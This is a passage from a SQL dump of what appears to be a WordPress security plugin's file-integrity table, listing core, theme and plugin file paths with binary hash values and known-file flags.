','wp-content/themes/twentynineteen/readme.txt',0,'dp�bӧ��g�Z�l�u','dp�bӧ��g�Z�l�u','�D/��(V�sc�q\"c!���nX�@�����$','',0,'?'),('�VT��2e�w�gߋu8','wp-includes/js/jquery/ui/button.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('�W𓃚�F��GjU�Z','wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~\n��+5�����4�','\\Λ;3X]��3��{{8�ҒZ\0�>��\\�&�','',0,'?'),('�i�+Hv#��وR�q','wp-includes/wp-includes/class-wp-recovery-mode.php',0,' �oxц��<N��',' �oxц��<N��','�4>���\r� j����s�dqm��H��l�7�~��','',0,'?'),('�v0�\ZwWo��5��@8','wp-content/themes/advance/inc/kirki/autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DD)\n�����W�e�','�\nr^�a^�qXA%��V�4)0�6��ZOHS��','',0,'?'),('�z�6��+���PH\r�tU','wp-includes/css/dist/block-library/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p>F��ő~���K��','fm��e)����$�4�_%��8�R��L��','',0,'?'),('�{I����Ϧ��','wp-content/themes/promote/css/unminified/animate.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g7q��709\r�3','�;B�h(oaї��4��if�c����b�;�2','',0,'?'),('���˥̰MVЗe�A�','wp-admin/js/widgets/media-video-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3S��-!@|��[�M','���s�n�����U������Bo3�}��+�+','',0,'?'),('���t��(�iltY/','wp-includes/css/dist/list-reusable-blocks/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����(����6�','��b1O�������:�DDHR�cj�ѐ�P�\r','',0,'?'),('��ѽՍ�J��SI���','wp-content/themes/skt-pathway/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�Bl��L�1Us��','ۙv���ʧ�\n>����B�9䶒�+ʼn�m','',0,'?'),('��Τe;y�[��9�9','wp-includes/js/jquery/ui/checkboxradio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"VSdF\n��k���:','$Lq���\'��i�>WuY\\���{�k���\r�{','',0,'?'),('����T�Mұ�5��O','wp-content/themes/travel-stories/js/jssor.slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ľ�ۮ��J�徜��','�~R�W;4G�\r���f-X�Կc��Q��','',0,'?'),('��\nL0Qod`�\\�;�','wp-content/plugins/wp-cerber/assets/icons/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T4�s�bRߺ0�','v �QNԯ�L�|̗E��,@���8By�:Y��','',0,'?'),('���B��u��d�Y','wp-includes/wp-includes/class-wp-feed-cache.php',0,'\Z��ط?h\"��%c��(\0','\Z��ط?h\"��%c��(\0','lh�>��6�<Z,2��1*!�cm;z~���4��','',0,'?'),('��3\"�(z�a�4�8�','wp-includes/images/media/code.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-o��Uʓ��U�U_','\'eM a[R#q2��kz�+*<�����7\0��j','',0,'?'),('��r�^��-w�N���','wp-content/themes/hueman/assets/front/img/demo/7-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�ng/�8Z|m����','�ȣ� .�1V�r��p�^ݞ9��?rf~$��ѷa','',0,'?'),('��g,s���t��\r�','wp-content/themes/advance/inc/kirki/includes/class-kirki-selective-refresh.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o\\\"d�[|�\0�Veq�','�C����<ŷ�s@n9P��\n�A$�;�&�L','',0,'?'),('��[\"�T�?=�bd','wp-content/themes/advance/inc/kirki/includes/class-kirki-customize-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��@S����њ�','�;��\"!��/-���I�_� \n�x� s~�h','',0,'?'),('�����G�ȍ�*�wWE','wp-content/themes/auberge/documentation/documentation.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�`Q���e͏b\\','6 �*{o�PO�+���C�`&#ؼ3�E','',0,'?'),('������/��:�n�#�','wp-content/themes/skt-pathway/change_log.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_8�x\'����N�k�u','��w �Q�Jd����{|��ސ�w,��S�\"','',0,'?'),('�����ܚh8��#�J�','wp-includes/wp-includes/customize/class-wp-customize-date-time-control.php',0,'(��ch�L��F�3�b','(��ch�L��F�3�b','�!V���#|��:�{Ǎ.a����(�[y�O%','',0,'?'),('���Q��s����ܰ\0','wp-includes/wp-includes/random_compat/random_bytes_com_dotnet.php',0,'nM@<��A6�@!�Y��','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('�\n�\"Y|�v���oE��','wp-content/plugins/all-in-one-wp-security-and-firewall/other-includes/wp-security-unlock-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2I�li��g���R�w','D�V����]�\\�P���f�y�K�u�a�m��','',0,'?'),('�~Q�ԁŴFp���','wp-includes/class-wp-taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kx�om���u�5t�','��8TI�|�|C�!��`vg�#�Q!ɓ{=��','',0,'?'),('�&v�3�j\r��r�^rt�','wp-content/themes/weblog/acmethemes/hooks/masonry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�,g}M��� ���N','�R��K�u�T��Ե��t?���\n2� C�7','',0,'?'),('�-Ob�G�?Ou�uhl','wp-includes/wp-includes/class-wp-block-styles-registry.php',0,'Kc�����\0z�[>�\rY','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('�2|�MJ�/�͆�^�}','wp-content/plugins/wp-cerber/assets/flags/ao.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K�\'��cu��fq�','�9&��[��؊�|�&���ʘ�����<��HR','',0,'?'),('�?�BM��j�@~tW\Z','wp-content/themes/promote/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��t�\\�����%s[d','��$�o��Z�X�\'ՍI�k�0�;ov<>�]��','',0,'?'),('�X滙��3(p\'�','wp-content/themes/newsmag/inc/customizer/settings/general/panels.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3q��[��� ','�J&��>�F��2��y���gIk\Z��ݑ�','',0,'?'),('�kHm�1��`0ѹ��_','wp-content/plugins/wordfence/lib/wordfenceConstants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2����sg�5�䃥l','�?*��\0Z:WX̩�k�k\0IM��UT','',0,'?'),('�z���O�M�&�K�|�','wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php',0,'r-�e��r^�!�~','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�Py�n','',0,'?'),('�zݿ�&X❙6���s','wp-admin/css/media-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E^?���7��v�+�z=','A�l:d�72[�X1R�w�#��ؤ�p��h5�6X','',0,'?'),('�|�������<��^','wp-content/themes/wp-barrister/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f�͒2�%��O�CE>�','�Hs[l�q �5\r(�@��/�<8�mu���','',0,'?'),('���Bd|�\Z�\'�Yb','wp-content/themes/promote/inc/kirki/includes/controls/class-kirki-controls-generic-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')Q`�A�|�%9\0�x+U','�=��%A|�c��V&���~��gX(�dn��\03Y','',0,'?'),('��!��y��F��]���','wp-admin/includes/class-wp-ajax-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&L�g=�%cn� }ǣ�','(��`���ĺ�E�ϙ)#��I�jHߠ�&�{','',0,'?'),('����\n ����(z','wp-includes/PHPMailer/Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������ߡ�M(���','��A+�n7�51�K���i��|Y��m','',0,'?'),('�����z(�d�\'dIt�\\','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/general/wp-security-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��4?N��Pɴ�_�','ȏ�DEDL]R���d��4�\"�$ A�vǓ�','',0,'?'),('��p��������2M','wp-includes/wp-includes/js/wp-lists.min.js',0,'��uP��*�L�[�C�','��uP��*�L�[�C�','!��JL=�Tl̞_p@��ȟ���R��M��S[','',0,'?'),('�ٵ\nh��Jx�dv�ԃ]','wp-content/plugins/wordfence/lib/wf503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�ݥ��!��YG�w','!�r�|�n�M�-��Yn6X�p����ʖ','',0,'?'),('��;:ޭQ�X�r�Y�.','wp-content/themes/promote/parts/part-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-q��8��{�u�Tv','�Â%ZW��%4.�w2~C�3XQr��W�Ì','',0,'?'),('���ب�R �C%>)��','wp-includes/wp-includes/js/jquery/ui/effect-highlight.min.js',0,'N���x���:��cT�','N���x���:��cT�','D�I�4h\ng�SZ����o|�(ޱs\r8�z��','',0,'?'),('�����m*�$�','wp-includes/wp-includes/js/jquery/suggest.js',0,':$tV�E�ʿ���',':$tV�E�ʿ���','r�,K�pŗrq^b�\\��=rZ�]��6�+','',0,'?'),('�$��Ld�N�B��1','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-utility-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0;�A�\\\\E�gC�^\\','�P��ˡr�#��bhI.�;��ٵ7�\'콀N','',0,'?'),('��^|J�ʕ\Z%��\"b�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i^e�]�M���@','�~\nf)��Z�����?\"z�I�\\�N乍��','',0,'?'),('��$�T�X�@#��A��','wp-admin/js/widgets/text-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�#)��i�M��}����','\n��^uӟf~LE5A�\0��r23�q6BSk���','',0,'?'),('���2zs�4x�EB','wp-includes/ID3/module.tag.id3v1.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IU��.Q�c�g���','�C��BH�9��D�y�;-�K�:LAx�?8\\~� ��','',0,'?'),('���I%�/^�Q/�E�<','wp-content/themes/pine/template-parts/content-single-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|F֠�5>�0B��HB4�','�n�ӛ�koʨ^r��u3(�2f���Vַ','',0,'?'),('�\0Or`d,�����m','wp-content/themes/hueman/assets/front/css/font-awesome.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4j�8����G���%','����MG�å����������J��(K}��','',0,'?'),('�_r#�Eȯ�̪%','wp-content/plugins/wp-cerber/assets/flags/ne.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�`R��$�`}L��\0\"�','h�~w=+^��Q#Wt/�� w�~�j���+','',0,'?'),('�Obc��\" ���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('�*��K��M9��¬t{','wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.js',0,'��k+%�5l3�!-��','��k+%�5l3�!-��','�2`���Ri�L��#e�4�6�g�p�o~�','',0,'?'),('�+�К��ԃ\r�I�','wp-content/themes/sg-window/inc/css/slider.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ewk�QW��ܛ��','b�/���7��!�G���k\"���f`«\\','',0,'?'),('�-�w�Voyvϭ$N','wp-includes/wp-includes/js/jquery/ui/effect-blind.min.js',0,'�ȷ��� ��m�7','�ȷ��� ��m�7','Q�X�_m�\\>��h�!Ƶ�^M���!V^&','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�5�u�uȸ��8�P�Һ','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���܊:����嵷Y','&��yZ��e��n��_���&���0�A �5','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?�ȴ����Y͆ ','�A��-�תe���`�)�\'WS>KXIZ��','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�\nXj�\'�;q�{��a�','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','KEȱ)��W�;�+�X�','���u��0�.Ƚ�ސ�-ƈǴ���]=$��','',0,'?'),('�O��c��ئ>�ha*v','wp-includes/wp-includes/Requests/Exception/HTTP/413.php',0,'�<�]ɐY��XL��','�<�]ɐY��XL��','\r��}�䟹-V�����\'eCCʅ�e-2,0','',0,'?'),('�U,�w���Q-{[�','wp-includes/wp-includes/js/colorpicker.js',0,'��V g�����-�','��V g�����-�','�V�w��%�%�:�3CQ#+g�� ��e�}�','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�II�ٹ�$V��;�','p�K�-��.,�ZT�!��:-[�������','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d\"��\"M��aM�w�M','O��m��y���6ۆ�x`R0Nh[7\0]�%�ʞ','',0,'?'),('�e���h�SWb_ÉC�','wp-content/themes/hueman/assets/czr/css/img/jquery.fs.stepper-arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/!C�\ra2���ռ;��2',' �^���$Vy˃0?�N�}�H6��?鶬','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u����� X�9\"QB','Hg�-�9������O�2G����f�#�B���S','',0,'?'),('�sXb��&A/�� �P','wp-content/themes/sg-window/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$y�Ԅ�;��@��6�','�-�\\=��\\@Y��ʉ��l���x�%��];','',0,'?'),('jʻ�Q�p��$','wp-content/themes/fastblog/landing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','35M�C�w%�I�','��#eǚ�ZU{�L�3J���Q�y7U�nϢ�','',0,'?'),('2�`ZeU�T���','wp-includes/wp-includes/js/plupload/plupload.min.js',0,'���6�JJ�7�+�','���6�JJ�7�+�','�+\"��Q���/N:�T$��\"���ȯ\r8v_3','',0,'?'),('��̰��O����/#','wp-content/themes/wp-barrister/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%e3���_�p�','����\"[��<y��V��6�XJ��}��z0','',0,'?'),('�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('���Ň�a��A�','wp-includes/wp-includes/js/backbone.min.js',0,'��`ft7\\J�*��4a','��`ft7\\J�*��4a','j�˯�}j�$��@�č��� n%Q|�l��','',0,'?'),('¯61�:a��E�\0AM','wp-includes/wp-includes/js/jquery/ui/menu.js',0,'��V7g����q�ʤ','��V7g����q�ʤ','O&����x�1�,m��Q�c��YE�#RG���','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�\"�\r\r�','x��=��|ˋ{�lbn��;��Ep���r�?','',0,'?'),('�t���~܌=�kƦ�','wp-includes/wp-includes/css/dist/nux/style.css',0,',�L��g�a�J\\',',�L��g�a�J\\','��)��v5i�B�:#��%����N�����','',0,'?'),('��z�Z�9ɟQ�56�','wp-includes/wp-includes/js/customize-preview.min.js',0,'�tQ��M�ʈ�����','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('��)Gr:�8�q��','wp-includes/wp-includes/class-wp-comment-query.php',0,'d���!T0^ę��:�','d���!T0^ę��:�','�Q����M�����b?S��_c%��C1`A\0','',0,'?'),('����\\@��x�h��','wp-includes/wp-includes/SimplePie/Parser.php',0,'�+��dGzC\0��u\r��','�+��dGzC\0��u\r��','a���,�\"���Ɣ_*{�Z��m���ɛ���','',0,'?'),('� 1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('��-� �~��cҢ��','wp-includes/wp-includes/blocks.php',0,'�[\"����#�\'','�[\"����#�\'','j��$��)�~ŗH�x���}J�1z�м�v��','',0,'?'),('��]��ۓl�ӮOa','wp-content/themes/vision-lite/inc/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\' �#\'a*��/','�Ћ��^\0��ITZ�����ʔ�A?��I:[~\'w','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('�&��ez��Qmk\0�&','wp-includes/wp-includes/Requests/Transport/cURL.php',0,'��87a`CZ��','��87a`CZ��','hI���� x<�������%��ji�����$','',0,'?'),('����$cB�2r�?I�','wp-includes/wp-includes/js/tinymce/utils/validate.js',0,'CL�1?o+;���{Y�','CL�1?o+;���{Y�','k�H��;�\0�kC�s� \'K�#45+eE|���0','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�69SH\nƻ��/��(�','�(c%��vW�S�xEuς><���¶�Ȯ[� ','',0,'?'),('�jw��m��́�s','wp-content/themes/auberge/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�i�z4��\rT�\\G�','���F�}�Ռ���O�X���� #����#�','',0,'?'),('�2�+��hb���S�ER','wp-content/themes/skt-pathway/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��6�1\0�gS\\QV','��nf�:���}��l�R5���+u�s��R8f]�','',0,'?'),('�F�h�u��0�,��','wp-content/themes/promote/inc/kirki/includes/lib/class-aricolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u>�B���m��}��5�','��7\n�DQ��Kx���o%�&)�b�@;�e��ö','',0,'?'),('�I�.��G�лaɶ','wp-content/themes/Yegor/content-page.php',0,'y�+?���\"��{*','y�+?���\"��{*','���a�<O7Q��?\'��I� �:�hW�0*�%�X�','',0,'?'),('�P,�]1�P�zT60�','wp-content/themes/advance/inc/kirki/includes/class-kirki-sanitize-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��Z_���D�\'�����','R;+$����XNűm�X6ʒ�J�FYgOX1M��[','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�Xׅ��OC[4�8*�','wp-content/themes/anima/cryout/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[VL�;3��5�m�',')�X���\'E.��.�� �R\Z��F��|��`','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ǭ��� ���','�7�.{��=�5�A�~�\r~.A(0Z��Q�2�','',0,'?'),('�e�Ԫ{.d���iX([�','wp-content/themes/advance/css/preloder.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Zj\'&>�e�n]��dn�','|����w�Z��A�܀26x%�P��Q�qb','',0,'?'),('�iHPC�|5U\0`� r�H','wp-includes/wp-includes/js/dist/deprecated.js',0,'�B�v\"} �H���}��T','�B�v\"} �H���}��T','5\r�_��I��h�MJuk��Q�ͣ�չ���zn','',0,'?'),('�|m���@8�S�>=��','wp-includes/wp-includes/blocks/code/block.json',0,' �2z`������A�%�',' �2z`������A�%�','W��@\r�8�Q��u�\0H� �WhR��ے0c���','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p{��[��˔� ','�9�o���G�f�pmeG�#`�:Q�{`�','',0,'?'),('ÏD Gz��N�3�o�','wp-content/themes/capacious/assets/css/hover.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2b o��W���','�(q��s��2�������!3=ܼ<Z8���','',0,'?'),('ã_�>\nJH�Q���','wp-content/themes/hueman/option-tree/includes/ot-functions-admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JQ�ⷊ� K��>]XL','\0��\r\'��5X� G([�\'���[�s��%�','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&F�8ĺa���!��','�i�fwU,D9�a�S\\S���n0˸w��1�','',0,'?'),('ç�?��<}��`C','wp-includes/wp-includes/js/dist/keycodes.js',0,'!a���� ��5/ �','!a���� ��5/ �','8*�Zu%V��,�3Yb���k־�&) ���E','',0,'?'),('èuT��^jP��6�','wp-includes/wp-includes/images/smilies/icon_confused.gif',0,'/# �Ӣww$x꾓Y','/# �Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('éR�%��ӚZ#+�\"','wp-includes/wp-includes/js/dist/media-utils.js',0,'��3)PvLiJO�|��','��3)PvLiJO�|��','�c��BD����ҕ���2+��k�`1<��*�w�˕','',0,'?'),('ê\"i�Dm�#`���:','wp-content/themes/maxbusiness/css/simplelightbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���+P����l뾍8^�','�x��jF��W��t͔�{�D�C�����i�i ','',0,'?'),('ó�������T��gZ','wp-content/themes/Endolf/guide.php',0,'�6�E�ׅ\rP\\��Z','�6�E�ׅ\rP\\��Z','�\0�-���U������o����xrDAX�$�','',0,'?'),('ü�{V+�ϷH�֖','wp-includes/wp-includes/class-wp-text-diff-renderer-table.php',0,'�-�����g0HFuI�','�-�����g0HFuI�','�_h+�U��H�i��_��e� w����6��','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ\ZBab�_ƺ�01Q','\n����譂:|���D�g�����DU�\r�=','',0,'?'),('��Qz��x=]$�ozc\'','wp-content/themes/shopone/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����h�xX\0�@��','��|a�,�a�r,E��_a�˝����D���a�','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('��rSө?�x��c�k�','wp-content/themes/storeone/inc/sanitize-cb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nɤ�;���*;1>','d*]�o�|�\"��}Y�Hm}2+�>ǡ28Դ','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=b��)�z��(��','��\\���.�[-�C��-�E>B᧶9�����','',0,'?'),('��%�x#B�9ܳ�?�y�','wp-includes/wp-includes/images/smilies/icon_cry.gif',0,'�+`Ůd�W]�����h','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('��4�l!�r�����','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('��e��fz���eox��','wp-content/themes/twentytwentyone/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"qѹ��sԬ','�J��3��mZ��2:��d�\\�6_�Շ�c*4','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��V��cꘄ','G�%*�J ���$��o=�@��k����Jl�','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('��(h�E��gԟRu','wp-content/themes/hueman/assets/front/js/lib/requestAnimationFramePolyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']��LV���z��VQ','F@��T5\'}%��\'��=��\n%zA����\n9','',0,'?'),('�ň��/���tNҊb','wp-content/plugins/wordfence/css/wfselect2.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����3,B�V���','��ڑ�t4U��\"�;�t�7�\Z�Jy�rb@','',0,'?'),('����2�k�����','wp-content/themes/anima/cryout/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��9���\"�4��','����N��)��5�v�K4A��RV��q j','',0,'?'),('�r�]J)Ցl��!m','wp-content/themes/auberge/footer-credits.php',0,'������B�&��̍�','������B�&��̍�','�#Z�8��V�6J�s*(X.��G�\'��͜K','',0,'?'),('�&)����N~&����','wp-content/themes/twentytwentyone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����ّ^R� ','\Z��u�@�\'\\��KL�82�B��r�\Z2HC�o','',0,'?'),('�,KRV�]�\"J�','wp-content/themes/showcase-lite/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kn�Mԯ�/�=�','Al_���W6��V��(�\'�Hڤ��4�S�ߠ','',0,'?'),('�/;xO;��?�3�t/�','wp-content/themes/promote/css/unminified/foundation.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�1��!\\ASQ�G','��zÒ��bG�[�u�L&�+�ޱ�{��~���','',0,'?'),('�G���\Z0���|��','wp-includes/wp-includes/class-wp-block-type.php',0,'�<Aj�Q�~$���~��','�<Aj�Q�~$���~��','��\\)�dw(?o���1�i�n�@�~KU6���Z','',0,'?'),('�W�� Ln<�RUc��>','wp-includes/wp-includes/SimplePie/Locator.php',0,'g�3�y�%14���','g�3�y�%14���','<���ms�4�3p-I�/�8\'J�� }.�','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r� j����s�dqm��H��l�7�~��','',0,'?'),('�y���x�Q3�p3�','wp-includes/wp-includes/js/dist/wordcount.min.js',0,'Ǣ�6Ӯ����H�pL','Ǣ�6Ӯ����H�pL','��A+l:#I�-A��5�J�iQ��ڙRW�w\0r�','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('ĔԼ���pP�Z 